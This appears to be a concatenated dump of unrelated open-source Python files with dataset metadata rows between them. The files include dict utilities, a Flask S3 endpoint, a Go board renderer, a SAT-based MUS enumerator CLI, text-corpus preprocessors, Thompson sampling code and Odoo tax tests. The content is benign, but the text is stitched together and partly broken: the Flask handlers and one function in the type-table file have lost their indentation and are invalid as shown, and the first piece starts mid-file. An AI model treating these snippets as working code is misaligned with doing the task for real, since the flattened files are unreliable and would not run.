        # NOTE(review): += mutates the tensor returned by level() in place --
        # assumed to be a fresh tensor; confirm level() does not return a view.
        levels += 1  # shift everything so that padding tokens have level 0
        levels = levels.t()  # [N, B]
        x = x + self.pos_embedding(levels)  # [N, B, D]
        return x
| haseebs/semantic-code-search | encoders/positional_encoder.py | positional_encoder.py | py | 1,635 | python | en | code | 4 | github-code | 50 |
11226024856 | from bitarray import bitarray
def compute_if_absent(some_dict, key, default_value_func):
    """Return some_dict[key], lazily inserting default_value_func() if absent.

    Like dict.setdefault, but the default factory is only invoked on a miss.
    Membership is tested with `in` so that keys legitimately mapped to None
    are returned as-is; the old `.get(...) is None` test re-invoked the
    factory (and overwrote the entry) for such keys.
    """
    if key not in some_dict:
        some_dict[key] = default_value_func()
    return some_dict[key]
def get_from_multi_level_dict(some_dict, keys):
    """Walk nested dicts along `keys`; return None as soon as a step is missing.

    With an empty key list the top-level dict itself is returned.
    """
    node = some_dict
    for key in keys:
        if node is None:
            return None
        node = node.get(key)
    return node
def init_bitset(length):
    """Return a bitarray of `length` bits with every bit cleared to 0."""
    cleared = bitarray(length)
    cleared.setall(0)
    return cleared
def print_multi_level_dict(some_dict, padding=0):
    """Pretty-print a nested dict, indenting two extra spaces per level.

    Keys are printed at the current padding; nested dicts recurse, any other
    value is printed on its own line below its key.
    """
    for key, value in some_dict.items():
        print(' ' * padding + str(key))
        if isinstance(value, dict):
            # isinstance (not `type(value) == dict`) so dict subclasses such
            # as defaultdict and OrderedDict are recursed into as well.
            print_multi_level_dict(value, padding + 2)
        else:
            print(' ' * (padding + 2) + str(value))
45828721608 | from os import environ
import boto3
from flask import Blueprint, jsonify
from flask_api import status
BUCKET_NAME = environ.get("BUCKET_NAME")
AWS_ENDPOINT = environ.get("AWS_ENDPOINT")
service = Blueprint("service", __name__)
@service.route("/")
def healthcheck():
return "Healthy", status.HTTP_200_OK
@service.route("/objects")
def list_objects():
s3_client = boto3.client("s3", endpoint_url=AWS_ENDPOINT)
try:
response = s3_client.list_objects(Bucket=BUCKET_NAME)
except Exception as exc:
return f"Error: {exc}", status.HTTP_500_INTERNAL_SERVER_ERROR
return jsonify(response.get("Contents", {})), status.HTTP_200_OK
| jim-sheldon/Flask-localstack | service/handlers.py | handlers.py | py | 663 | python | en | code | 0 | github-code | 50 |
38460413370 | import numpy as np
from PIL import Image, ImageDraw
def create_go_board_image(board, file_path):
    """Render a Go position (0 = black, 1 = white, anything else = empty).

    `board` is indexed board[i, j]; a square board is assumed since
    board.shape[0] sizes both axes -- TODO confirm for non-square inputs.
    If file_path is not None the image is saved there; the PIL Image is
    returned either way.
    """
    black_stone = (0, 0, 0)
    white_stone = (255, 255, 255)
    board_color = (222, 184, 135)  # was an unused local; now the background
    cell = 50  # pixels per grid line spacing

    img_size = board.shape[0] * cell
    img = Image.new('RGB', (img_size, img_size), board_color)
    # One Draw object reused everywhere (the original rebuilt it for every
    # line and every stone).
    draw = ImageDraw.Draw(img)

    # Grid: one horizontal and one vertical line per index.
    for i in range(board.shape[0]):
        draw.line((i * cell, 0, i * cell, img_size), fill=(0, 0, 0), width=2)
        draw.line((0, i * cell, img_size, i * cell), fill=(0, 0, 0), width=2)

    # Stones, centered on the grid intersections.
    for i in range(board.shape[0]):
        for j in range(board.shape[1]):
            if board[i, j] == 0:
                color = black_stone
            elif board[i, j] == 1:
                color = white_stone
            else:
                continue
            x, y = i * cell, j * cell
            draw.ellipse((x - 25, y - 25, x + 25, y + 25), fill=color, outline=(0, 0, 0), width=2)

    if file_path is not None:
        img.save(file_path)
    return img
| Jiankun-Huang/JBX-Go | modules/visualize.py | visualize.py | py | 1,225 | python | en | code | 1 | github-code | 50 |
25900615154 | #!/usr/bin/env python
import argparse
import atexit
import signal
import sys
import threading
import utils
import mapsolvers
import CNFsolvers
from MarcoPolo import MarcoPolo
def parse_args():
    """Parse the command line for the MUS/MCS enumerator.

    Prints help and exits when called with no arguments, and errors out when
    SMT input is requested on STDIN (z3 needs a real filename).
    """
    parser = argparse.ArgumentParser()
    # Standard arguments
    parser.add_argument('infile', nargs='?', type=argparse.FileType('rb'),
                        default=sys.stdin,
                        help="name of file to process (STDIN if omitted)")
    # default=0: action='count' otherwise leaves args.verbose as None when
    # the flag is absent, and `args.verbose > 1` (see setup_config) raises
    # TypeError on Python 3 for None.
    parser.add_argument('-v', '--verbose', action='count', default=0,
                        help="print more verbose output (constraint indexes for MUSes/MCSes) -- repeat the flag for detail about the algorithm's progress)")
    parser.add_argument('-a', '--alltimes', action='store_true',
                        help="print the time for every output")
    parser.add_argument('-s', '--stats', action='store_true',
                        help="print timing statistics to stderr")
    parser.add_argument('-T', '--timeout', type=int, default=None,
                        help="limit the runtime to TIMEOUT seconds")
    parser.add_argument('-l', '--limit', type=int, default=None,
                        help="limit number of subsets output (counting both MCSes and MUSes)")
    type_group = parser.add_mutually_exclusive_group()
    type_group.add_argument('--cnf', action='store_true',
                            help="assume input is in DIMACS CNF or Group CNF format (autodetected if filename is *.[g]cnf or *.[g]cnf.gz).")
    type_group.add_argument('--smt', action='store_true',
                            help="assume input is in SMT2 format (autodetected if filename is *.smt2).")
    parser.add_argument('-b', '--bias', type=str, choices=['MUSes', 'MCSes'], default='MUSes',
                        help="bias the search toward MUSes or MCSes early in the execution [default: MUSes] -- all will be enumerated eventually; this just uses heuristics to find more of one or the other early in the enumeration.")
    # Experimental / Research arguments
    exp_group = parser.add_argument_group('Experimental / research options', "These can typically be ignored; the defaults will give the best performance.")
    exp_group.add_argument('--mssguided', action='store_true',
                           help="check for unexplored subsets in immediate supersets of any MSS found")
    exp_group.add_argument('--ignore-implies', action='store_true',
                           help="do not use implied literals from Map as hard constraints")
    exp_group.add_argument('--dump-map', nargs='?', type=argparse.FileType('w'),
                           help="dump clauses added to the Map formula to the given file.")
    exp_group.add_argument('--block-both', action='store_true',
                           help="block both directions from the result type of interest (i.e., block subsets of MUSes for --bias high, etc.)")
    exp_group.add_argument('--force-minisat', action='store_true',
                           help="use Minisat in place of MUSer2 for CNF (NOTE: much slower and usually not worth doing!)")
    # Max/min-models arguments
    max_group_outer = parser.add_argument_group('  Maximal/minimal models options', "By default, the Map solver will efficiently produce maximal/minimal models itself by giving each variable a default polarity.  These options override that (--nomax, -m) or extend it (-M, --smus) in various ways.")
    max_group = max_group_outer.add_mutually_exclusive_group()
    max_group.add_argument('--nomax', action='store_true',
                           help="perform no model maximization whatsoever (applies either shrink() or grow() to all seeds)")
    max_group.add_argument('-m', '--max', type=str, choices=['always', 'half'], default=None,
                           help="get a random seed from the Map solver initially, then compute a maximal/minimal model (for bias of MUSes/MCSes, resp.) for all seeds ['always'] or only when initial seed doesn't match the --bias ['half'] (i.e., seed is SAT and bias is MUSes)")
    max_group.add_argument('-M', '--MAX', action='store_true', default=None,
                           help="computes a maximum/minimum model (of largest/smallest cardinality) (uses MiniCard as Map solver)")
    max_group.add_argument('--smus', action='store_true',
                           help="calculate an SMUS (smallest MUS) (uses MiniCard as Map solver)")

    args = parser.parse_args()

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    if args.smt and args.infile == sys.stdin:
        sys.stderr.write("SMT cannot be read from STDIN.  Please specify a filename.\n")
        sys.exit(1)

    return args
def at_exit(stats):
    """atexit hook: dump timing and count statistics from `stats` to stderr."""
    # print stats
    times = stats.get_times()
    counts = stats.get_counts()
    other = stats.get_stats()

    # sort categories by total runtime
    categories = sorted(times, key=times.get)
    maxlen = max(len(x) for x in categories)
    for category in categories:
        sys.stderr.write("%-*s : %8.3f\n" % (maxlen, category, times[category]))
    for category in categories:
        if category in counts:
            # "+ 6" widens the name column to fit the " count"/" per" suffixes.
            sys.stderr.write("%-*s : %8d\n" % (maxlen + 6, category + ' count', counts[category]))
            sys.stderr.write("%-*s : %8.5f\n" % (maxlen + 6, category + ' per', times[category] / counts[category]))

    # print min, max, avg of other values recorded
    if other:
        maxlen = max(len(x) for x in other)
        for name, values in other.items():
            sys.stderr.write("%-*s : %f\n" % (maxlen + 4, name + ' min', min(values)))
            sys.stderr.write("%-*s : %f\n" % (maxlen + 4, name + ' max', max(values)))
            sys.stderr.write("%-*s : %f\n" % (maxlen + 4, name + ' avg', sum(values) / float(len(values))))
def setup_execution(args, stats):
    """Install signal handlers, an optional timeout alarm, and the stats dump.

    SIGTERM/SIGINT (and SIGALRM when --timeout is given) all print a message
    and exit with status 128, which fires the atexit hook registered below.
    """
    # register timeout/interrupt handler
    def handler(signum, frame):
        if signum == signal.SIGALRM:
            sys.stderr.write("Time limit reached.\n")
        else:
            sys.stderr.write("Interrupted.\n")
        sys.exit(128)
        # at_exit will fire here

    signal.signal(signal.SIGTERM, handler)  # external termination
    signal.signal(signal.SIGINT, handler)   # ctl-c keyboard interrupt

    # register a timeout alarm, if needed
    if args.timeout:
        signal.signal(signal.SIGALRM, handler)  # timeout alarm
        signal.alarm(args.timeout)

    # register at_exit to print stats when program exits
    if args.stats:
        atexit.register(at_exit, stats)
def setup_solvers(args):
    """Instantiate the constraint solver and the Map solver from parsed args.

    The input format (CNF vs SMT) comes from --cnf/--smt or is guessed from
    the filename; a missing backend library/binary aborts with a message.
    Returns the pair (csolver, msolver).
    """
    infile = args.infile

    # create appropriate constraint solver
    if args.cnf or infile.name.endswith('.cnf') or infile.name.endswith('.cnf.gz') or infile.name.endswith('.gcnf') or infile.name.endswith('.gcnf.gz'):
        if args.force_minisat:
            try:
                csolver = CNFsolvers.MinisatSubsetSolver(infile)
            except OSError as e:
                sys.stderr.write("[31;1mERROR:[m Unable to load pyminisolvers library.\n[33mRun 'make -C pyminisolvers' to compile the library.[m\n\n")
                sys.stderr.write(str(e) + "\n")
                sys.exit(1)
        else:
            try:
                csolver = CNFsolvers.MUSerSubsetSolver(infile)
            except CNFsolvers.MUSerException as e:
                sys.stderr.write("[31;1mERROR:[m Unable to use MUSer2 for MUS extraction.\n[33mUse --force-minisat to use Minisat instead[m (NOTE: it will be much slower.)\n\n")
                sys.stderr.write(str(e) + "\n")
                sys.exit(1)
            except OSError as e:
                sys.stderr.write("[31;1mERROR:[m Unable to load pyminisolvers library.\n[33mRun 'make -C pyminisolvers' to compile the library.[m\n\n")
                sys.stderr.write(str(e) + "\n")
                sys.exit(1)
        infile.close()
    elif args.smt or infile.name.endswith('.smt2'):
        try:
            from SMTsolvers import Z3SubsetSolver
        except ImportError as e:
            sys.stderr.write("ERROR: Unable to import z3 module: %s\n\nPlease install Z3 from https://z3.codeplex.com/\n" % str(e))
            sys.exit(1)
        # z3 has to be given a filename, not a file object, so close infile and just pass its name
        infile.close()
        csolver = Z3SubsetSolver(infile.name)
    else:
        sys.stderr.write(
            "Cannot determine filetype (cnf or smt) of input: %s\n"
            "Please provide --cnf or --smt option.\n" % infile.name
        )
        sys.exit(1)

    # create appropriate map solver
    if args.nomax or args.max:
        varbias = None  # will get a "random" seed from the Map solver
    else:
        varbias = (args.bias == 'MUSes')  # High bias (True) for MUSes, low (False) for MCSes
    try:
        if args.MAX or args.smus:
            # Cardinality-constrained map solver for maximum models / SMUS.
            msolver = mapsolvers.MinicardMapSolver(n=csolver.n, bias=varbias)
        else:
            msolver = mapsolvers.MinisatMapSolver(n=csolver.n, bias=varbias, dump=args.dump_map)
    except OSError as e:
        sys.stderr.write("[31;1mERROR:[m Unable to load pyminisolvers library.\n[33mRun 'make -C pyminisolvers' to compile the library.[m\n\n")
        sys.stderr.write(str(e) + "\n")
        sys.exit(1)

    return (csolver, msolver)
def setup_config(args):
    """Translate parsed CLI arguments into the MarcoPolo configuration dict."""
    # Maximization strategy: explicit flags win, otherwise the Map solver's
    # built-in polarity-based maximization is used ('solver').
    if args.nomax:
        maximize = 'none'
    elif args.smus:
        maximize = 'always'
    elif args.max:
        maximize = args.max
    elif args.MAX:
        maximize = 'solver'
    else:
        maximize = 'solver'

    return {
        'bias': args.bias,
        'smus': args.smus,
        'maximize': maximize,
        'use_implies': not args.ignore_implies,  # default is to use them
        'mssguided': args.mssguided,
        'block_both': args.block_both,
        'verbose': args.verbose > 1,
    }
def main():
    """Entry point: build the solvers from CLI args and enumerate results."""
    stats = utils.Statistics()

    with stats.time('setup'):
        args = parse_args()
        setup_execution(args, stats)
        csolver, msolver = setup_solvers(args)
        config = setup_config(args)
        mp = MarcoPolo(csolver, msolver, stats, config)

    # useful for timing just the parsing / setup
    if args.limit == 0:
        sys.stderr.write("Result limit reached.\n")
        sys.exit(0)

    # enumerate results in a separate thread so signal handling works while in C code
    # ref: https://thisismiller.github.io/blog/CPython-Signal-Handling/
    def enumerate():
        # Prints one line per result, honoring --alltimes / -v formatting
        # and the --limit cap on the number of results.
        remaining = args.limit

        for result in mp.enumerate():
            output = result[0]
            if args.alltimes:
                output = "%s %0.3f" % (output, stats.current_time())
            if args.verbose:
                # Constraint indexes are reported 1-based.
                output = "%s %s" % (output, " ".join([str(x + 1) for x in result[1]]))

            print(output)

            if remaining:
                remaining -= 1
                if remaining == 0:
                    sys.stderr.write("Result limit reached.\n")
                    sys.exit(0)

    enumthread = threading.Thread(target=enumerate)
    enumthread.daemon = True  # so thread is killed when main thread exits (e.g. in signal handler)
    enumthread.start()
    enumthread.join(float("inf"))  # timeout required for signal handler to work; set to infinity
# Script entry point: run the enumerator when invoked directly.
if __name__ == '__main__':
    main()
| batchenRothenberg/AllRepair | python/marco.py | marco.py | py | 11,275 | python | en | code | 8 | github-code | 50 |
26901819625 | import abc
from typing import List, Tuple
class ClassificationCorpusPreprocessor(abc.ABC):
    '''Abstract base class for classification-corpus preprocessors.

    input: path to input file
    return: list of tuples (class_no, class_name, text)
    '''
    @abc.abstractmethod
    def preprocess(self, file_path:str)->List[Tuple[str, str, str]]:
        '''Parse the file at file_path into (class_no, class_name, text) tuples.'''
        pass
class TouTiaoNewsPreprocessor(ClassificationCorpusPreprocessor):
    '''Preprocessor for the TouTiao news-title dataset.

    https://github.com/skdjfla/toutiao-text-classfication-dataset.git
    Each line looks like:
        6552475601595269390_!_101_!_news_culture_!_<title>_!_<keywords>
    and is parsed into (class_no, class_name, title).
    '''
    def __init__(self):
        # Field separator used by the dataset.
        self.delimeter = '_!_'

    def preprocess(self, file_path:str) ->List[Tuple[str, str, str]]:
        '''Parse each line into (class_no, class_name, title).'''
        res = []
        # "with" + explicit encoding: the original never closed the handle
        # and relied on the platform default encoding for this UTF-8 corpus.
        with open(file_path, 'r', encoding='utf-8') as file:
            for l in file.readlines():
                toks = l.split(self.delimeter)
                classno = toks[1]
                classname = toks[2]
                title = toks[3]
                res.append((classno, classname, title))
        return res
import json
class TravelReviewPreprocessor(ClassificationCorpusPreprocessor):
    '''Preprocessor for Chinese travel-review JSON-lines data.

    https://github.com/lsvih/chinese-customer-review
    Each line is a JSON object {"s": <sentence>, "ot": <opinion target>};
    yielded as (None, target, sentence) -- there is no numeric class id.
    '''
    def preprocess(self, file_path:str) ->List[Tuple[str, str, str]]:
        '''Parse each JSON line into (None, target, sentence).'''
        res = []
        # "with" + explicit encoding: the original never closed the handle
        # and relied on the platform default encoding for this UTF-8 corpus.
        with open(file_path, 'r', encoding='utf-8') as file:
            for l in file.readlines():
                obj = json.loads(l)
                classno = None
                classname = obj['ot']
                title = obj['s']
                res.append((classno, classname, title))
        return res
| shazi7804/aws-cdk-sagemaker-model-endpoints | app/nlp_processing/preprocess.py | preprocess.py | py | 2,563 | python | en | code | 1 | github-code | 50 |
27213230237 | #Returns a dictionary of types and their advantages.
#Also returns a dictionary of types and the file location to the label.
#These type_numbers are arbitrarily given to the types
#Its only for consistency
types = ["Normal","Fighting","Flying","Poison","Ground","Rock","Bug","Ghost","Steel","Fire","Water","Grass","Electric","Psychic","Ice","Dragon","Dark","Fairy"]
type_numbers=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]
def createEffectivenessTypeless():
i = 0
advantages = {}
while i != 18:
advantages[types[i]] = 1
i = i + 1
print(advantages)
def createEffectiveness(lst):
    """Map each of the 18 type names to its multiplier from `lst`.

    `lst` is parallel to the module-level `types` list.  The module header
    promises a returned dictionary, but the original only printed it; the
    dict is now returned as well, with the print kept for compatibility.
    """
    advantages = {types[i]: lst[i] for i in range(18)}
    print(advantages)
    return advantages
#Returns the file location for the type image
def returnImage(type):
    """Return the label-image path for the given type name (incl. "Typeless")."""
    # Every label file is 'Type Labels\<lowercased name>.jpg'; building the
    # dict programmatically keeps the original KeyError for unknown names.
    label_names = ["Typeless", "Normal", "Fighting", "Flying", "Poison",
                   "Ground", "Rock", "Bug", "Ghost", "Steel", "Fire", "Water",
                   "Grass", "Electric", "Psychic", "Ice", "Dragon", "Dark",
                   "Fairy"]
    jpgFiles = {name: 'Type Labels\\' + name.lower() + '.jpg' for name in label_names}
    return jpgFiles[type]
18661870882 | '''
Main utility functions
'''
import numpy as np
import tensorflow as tf
def preprocess_targets(targets, words2int, batch_size):
    """Prepend <SOS> to every target sequence and drop its last token.

    Returns a [batch_size, seq_len] tensor suitable as decoder input.
    """
    sos_column = tf.fill([batch_size, 1], words2int['<SOS>'])
    trimmed = tf.strided_slice(targets, [0, 0], [batch_size, -1], [1, 1])
    return tf.concat([sos_column, trimmed], 1)
def apply_padding(batch_of_sequences, words2int):
    """Right-pad every sequence with <PAD> up to the longest sequence length.

    Returns a new list of lists.  An empty batch yields an empty list
    (`max(..., default=0)` avoids the ValueError the bare max() raised).
    """
    max_sequence_length = max((len(sequence) for sequence in batch_of_sequences), default=0)
    return [sequence + [words2int['<PAD>']] * (max_sequence_length - len(sequence))
            for sequence in batch_of_sequences]
def split_into_batches(questions, answers, questionswords2int, answerswords2int, batch_size):
    """Yield aligned (questions, answers) batches as padded numpy arrays.

    Only complete batches are produced; a trailing partial batch is dropped.
    """
    num_batches = len(questions) // batch_size
    for batch_index in range(num_batches):
        start = batch_index * batch_size
        end = start + batch_size
        question_batch = apply_padding(questions[start:end], questionswords2int)
        answer_batch = apply_padding(answers[start:end], answerswords2int)
        yield np.array(question_batch), np.array(answer_batch)
def get_training_validation_data(questions, answers, validation_set_ratio):
    """Split parallel question/answer lists into training and validation parts.

    The first `len * ratio` (floored) items become the validation set; the
    remainder is the training set.  Returns
    (training_questions, training_answers, validation_questions, validation_answers).
    """
    split_point = int(len(questions) * validation_set_ratio)
    return (
        questions[split_point:],
        answers[split_point:],
        questions[:split_point],
        answers[:split_point],
    )
| manikanthr5/OpenDomainChatbot | nlp_utils.py | nlp_utils.py | py | 1,730 | python | en | code | 11 | github-code | 50 |
14604091999 | #!/usr/bin/python
import os
import subprocess
import re
import shlex
files = [f for f in os.listdir('.') if os.path.isfile(f)]
cwd = os.getcwd()

homeworkfiles = []
homeworkdirectories = []
# Homework submissions are files whose names start with 'e'; each one is
# extracted into a directory named after its first 8 characters.
for f in files:
    if f.startswith('e'):
        homeworkfiles.append(f)
        homeworkdirectories.append(f[0:8])
        if not os.path.exists(os.path.join(cwd, f[0:8])):
            os.makedirs(f[0:8])

for hwfile, hwdirectory in zip(homeworkfiles, homeworkdirectories):
    # Pass argv as a list (shell=False): the old string concatenation plus
    # shlex.split broke on filenames containing spaces or shell
    # metacharacters.  (The unused `replaced = re.sub(...)` escaping hack
    # was dropped for the same reason.)
    args = ["tar", "-xzvf", hwfile, "-C", hwdirectory]
    p = subprocess.Popen(args)
    p.wait()
1500206109 | import sys
import pygame
from settings import Settings
from ship import Ship
def run_game():
    """Initialize pygame, create the game window, and run the main loop."""
    # Initialize pygame and create the screen object.
    pygame.init()
    screen = pygame.display.set_mode((1200, 800))
    pygame.display.set_caption("Alien Invasion")
    # Background color: the original left this assignment commented out but
    # still referenced bg_color below, raising NameError on the first frame.
    bg_color = (129, 216, 207)
    # Main game loop.
    while True:
        # Watch for keyboard and mouse events.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                sys.exit()
        # Redraw the screen and make the most recent frame visible.
        screen.fill(bg_color)
        pygame.display.flip()


run_game()
34468730555 | """Read class metadata."""
import json
from typing import Iterable
import polars as pl
from polars.type_aliases import FrameType as FrameType
from mo.core import dtypes
from mo.core.interfaces import IReader
from mo.core.typing import PathStr
class ManifestReader(IReader):
    """Read a "complete list" classes manifest CSV into a polars LazyFrame.

    Rows are filtered to those with a non-null class_id and matching the
    configured `status` and `class_type`.
    """
    def __init__(self, status: str = "complete", class_type: str = "real") -> None:
        # status: value the manifest's `status` column must equal.
        # class_type: value the manifest's `class_type` column must equal.
        super().__init__()
        self.status = status
        self.class_type = class_type
    def __call__(self, input: PathStr) -> pl.LazyFrame:
        """Read a "complete list" classes manifest CSV file."""
        # Lazily scan the CSV with the shared manifest dtypes, then apply
        # the row filters; nothing is materialized until collected.
        return (
            pl.scan_csv(input, dtypes=dtypes.manifest)
            .filter(pl.col("class_id").is_not_null())
            .filter(pl.col("status") == self.status)
            .filter(pl.col("class_type") == self.class_type)
        )
class ClassesReader(IReader):
    """Read a "classes.csv" data-download CSV into a polars LazyFrame.

    Columns are renamed to the canonical schema (instructor_id, version,
    course, book_config) and one legacy course identifier is replaced by its
    display name.  NOTE(review): `status`/`class_type` are stored but not
    used in __call__ — confirm whether filtering was intended here too.
    """
    def __init__(self, status: str = "complete", class_type: str = "real") -> None:
        super().__init__()
        self.status = status
        self.class_type = class_type
    def __call__(self, input: PathStr) -> pl.LazyFrame:
        """Read a "classes.csv" CSV file from a data download."""
        return (
            pl.scan_csv(input, dtypes=dtypes.metadata)
            .filter(pl.col("class_id").is_not_null())
            # Map download column names onto the canonical schema.
            .rename(
                {
                    "teacher_id": "instructor_id",
                    "release": "version",
                    "course_name": "course",
                    "setup_yaml": "book_config",
                }
            )
            # Replace the legacy repo-style course id with its display name.
            .with_columns(
                course=pl.when(pl.col("course") == "UCLATALL/czi-stats-course")
                .then("Statistics and Data Science: A Modeling Approach")
                .otherwise(pl.col("course"))
            )
        )
    @staticmethod
    def pages_from_setup(setup_yaml: str) -> Iterable[str]:
        """Parse a setup_yaml JSON string into a flat list of page names.

        Malformed JSON, a missing "chapters" key, or a non-iterable value
        all degrade gracefully to an empty result.
        """
        try:
            chapters = json.loads(setup_yaml)["chapters"]
            assert isinstance(chapters, Iterable)
        except (json.JSONDecodeError, KeyError, AssertionError):
            chapters = []
        pages: list[str] = []
        # Collect every chapter page entry that carries a string "name".
        for chapter in chapters: # type: ignore
            if "pages" in chapter and isinstance(chapter["pages"], Iterable):
                for page in chapter["pages"]: # type: ignore
                    if "name" in page:
                        assert isinstance(page["name"], str)
                        pages.append(page["name"]) # type: ignore
        return pages # type: ignore
| coursekata/mo | mo/core/read/classes.py | classes.py | py | 2,663 | python | en | code | 0 | github-code | 50 |
# LEGB rules
# Local, enclosed, global and built_in
# Built-in Scope
from math import pi
# This module-level assignment shadows math.pi in the global scope.
pi = 15
def outer():
    # `pi` here lives in outer()'s local scope, independent of the global.
    pi = 26
    def inner():
        # pi = 7
        # `nonlocal` rebinds outer()'s `pi` instead of creating a new local.
        nonlocal pi
        pi+=1
        print(pi)
    inner()
# Prints 27: outer's pi (26) incremented by inner() via nonlocal.
outer()
| SumathKetharaju/Sumanth_Uploads | sumanth_Initial_Programs/local_global.py | local_global.py | py | 237 | python | en | code | 1 | github-code | 50 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 31 17:03:58 2018
@author: bangyc

Thompson sampling for a 5-armed Bernoulli bandit with Beta priors.
"""
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(618)
# number of arm
K = 5
# probability distribution
# True success probability of each arm; arm 5 (5/6) is optimal.
true_prob = [1/6, 1/2, 2/3, 3/4, 5/6]
# Beta(1, 1) (uniform) prior parameters per arm.
beta_prior_alpha1 = [1, 1, 1, 1, 1]
beta_prior_alpha2 = [1, 1, 1, 1, 1]
# NOTE(review): these are aliases of the prior lists (no copy), so the
# posterior updates below mutate the priors too; harmless here since the
# priors are not used again.
beta_post_alpha1 = beta_prior_alpha1
beta_post_alpha2 = beta_prior_alpha2
# total times
T = 666
rewards = []
regrets = []
avg_regrets = []
# N[k] counts how many times arm k has been pulled.
N = [0, 0, 0, 0, 0]
# average_n[t] holds the pull fractions N/(t+1) after round t.
average_n = []
# Thompson sampling: each round, sample a success probability for every arm
# from its Beta posterior and pull the arm with the largest sample.
for t in np.arange(T):
    sampled_post = []
    for k in np.arange(K):
        sampled = np.random.beta(beta_post_alpha1[k], beta_post_alpha2[k])
        sampled_post.append(sampled)
    action = np.argmax(sampled_post)
    # pulled Arm to get reward
    reward = np.random.binomial(1, true_prob[action])
    # Regret relative to the best arm's mean (5/6).
    regret = 5/6 - reward
    N[action] = N[action] + 1
    average_n.append(list(map(lambda x: x / (t + 1), N)))
    rewards.append(reward)
    regrets.append(regret)
    avg_regrets.append(np.mean(regrets))
    # update the posterior
    # Beta-Bernoulli conjugate update: alpha1 += reward, alpha2 += 1-reward.
    beta_post_alpha1[action] = beta_post_alpha1[action] + reward
    beta_post_alpha2[action] = beta_post_alpha2[action] + 1 - reward
# Find the first round after which the optimal arm's pull fraction exceeds
# 0.95 and stays above it for 10 consecutive rounds.
count = 0
for t in np.arange(T):
    if average_n[t][4] > 0.95:
        count += 1
        if count >= 10:
            print("the first time achieve 0.95 and stays 10 steps: %d" % t)
            break
    else:
        count = 0
average_n = np.array(average_n)
# Posterior mean of each arm: alpha1 / (alpha1 + alpha2).
estimate_prob = list(map(lambda x, y: x / (x + y), beta_post_alpha1, beta_post_alpha2))
# Two posterior standard deviations, used as the error-bar half-width.
estimate_error = list(map(lambda x, y: 2 * np.sqrt(x*y/((x + y + 1) * (x + y)**2)), beta_post_alpha1, beta_post_alpha2))
# plot average regret vs time
plt.figure(1)
# plt.title("average regret vs time")
plt.xlabel("time")
plt.ylabel("average regret")
plt.plot(np.arange(1, T + 1), avg_regrets)
plt.savefig('q3.png')
plt.close()
# plot true mu, estimate mu and its confidence interval vs arm k
plt.figure(2)
# plt.title("mu vs arm K")
plt.xlabel("K")
plt.ylabel("Mu")
# Orange dots: true probabilities; blue: posterior means with error bars.
plt.scatter(range(1, 6), true_prob, c='orange')
plt.errorbar(range(1, 6), estimate_prob, yerr=estimate_error, fmt='o', c='blue')
plt.savefig('q4.png')
plt.close()
# plot
# Pull fraction of each arm over time; the optimal arm should dominate.
plt.figure(3)
# plt.title("average number vs time")
index = np.arange(1, T+1)
a1, = plt.plot(index, average_n[:,0])
a2, = plt.plot(index, average_n[:,1])
a3, = plt.plot(index, average_n[:,2])
a4, = plt.plot(index, average_n[:,3])
a5, = plt.plot(index, average_n[:,4])
plt.legend([a1, a2, a3, a4, a5], ['k=1', 'k=2', 'k=3', 'k=4', 'k=5'])
plt.savefig('q5.png')
plt.close() | yangjh39/CSE-547-ML-for-Big-Data | Tompson Sampling/Tompson Sampling.py | Tompson Sampling.py | py | 2,570 | python | en | code | 0 | github-code | 50 |
11026558740 | # -*- coding: utf-8 -*-
from odoo.addons.l10n_eu_oss.models.eu_tag_map import EU_TAG_MAP
from odoo.addons.account.tests.common import AccountTestInvoicingCommon
from odoo.tests import tagged
@tagged('post_install', 'post_install_l10n', '-at_install')
class TestOSSBelgium(AccountTestInvoicingCommon):
    """OSS (One-Stop Shop) tax mapping tests for a Belgian company."""
    @classmethod
    def setUpClass(self, chart_template_ref='l10n_be.l10nbe_chart_template'):
        # Set up a company on the Belgian chart of accounts; skip the whole
        # suite when the l10n_be module is not installed.
        try:
            super().setUpClass(chart_template_ref=chart_template_ref)
        except ValueError as e:
            if e.args[0] == "External ID not found in the system: l10n_be.l10nbe_chart_template":
                self.skipTest(self, reason="Belgian CoA is required for this testSuite but l10n_be isn't installed")
            else:
                raise e
        self.company_data['company'].country_id = self.env.ref('base.be')
        # Generate the OSS taxes for every other EU country.
        self.company_data['company']._map_eu_taxes()
    def test_country_tag_from_belgium(self):
        """OSS taxes must carry the Belgian OSS tax-report tags (grids 47/49)."""
        # get an eu country which isn't the current one:
        another_eu_country_code = (self.env.ref('base.europe').country_ids - self.company_data['company'].country_id)[0].code
        tax_oss = self.env['account.tax'].search([('name', 'ilike', f'%{another_eu_country_code}%')], limit=1)
        for doc_type, report_line_xml_id in (
            ("invoice", "l10n_be.tax_report_line_47"),
            ("refund", "l10n_be.tax_report_line_49"),
        ):
            with self.subTest(doc_type=doc_type, report_line_xml_id=report_line_xml_id):
                # Tags on the tax's base repartition lines for this doc type.
                oss_tag_id = tax_oss[f"{doc_type}_repartition_line_ids"]\
                    .filtered(lambda x: x.repartition_type == 'base')\
                    .tag_ids
                # The non-negating tag of the expected Belgian report line.
                expected_tag_id = self.env.ref(report_line_xml_id)\
                    .tag_ids\
                    .filtered(lambda t: not t.tax_negate)
                self.assertIn(expected_tag_id, oss_tag_id, f"{doc_type} tag from Belgian CoA not correctly linked")
@tagged('post_install', 'post_install_l10n', '-at_install')
class TestOSSUSA(AccountTestInvoicingCommon):
    """OSS taxes must not be created for a non-EU (US) company."""
    @classmethod
    def setUpClass(self, chart_template_ref=None):
        super().setUpClass(chart_template_ref=chart_template_ref)
        self.company_data['company'].country_id = self.env.ref('base.us')
        # Mapping EU taxes on a US company should be a no-op.
        self.company_data['company']._map_eu_taxes()
    def test_no_oss_tax(self):
        """No OSS tax named after another EU country should exist."""
        # get an eu country which isn't the current one:
        another_eu_country_code = (self.env.ref('base.europe').country_ids - self.company_data['company'].country_id)[0].code
        tax_oss = self.env['account.tax'].search([('name', 'ilike', f'%{another_eu_country_code}%')], limit=1)
        self.assertFalse(len(tax_oss), "OSS tax shouldn't be instanced on a US company")
@tagged('post_install', 'post_install_l10n', '-at_install')
class TestOSSMap(AccountTestInvoicingCommon):
    """Sanity-check the static EU_TAG_MAP against installed report lines."""
    def test_oss_eu_tag_map(self):
        """ Checks that the xml_id referenced in the map are correct.
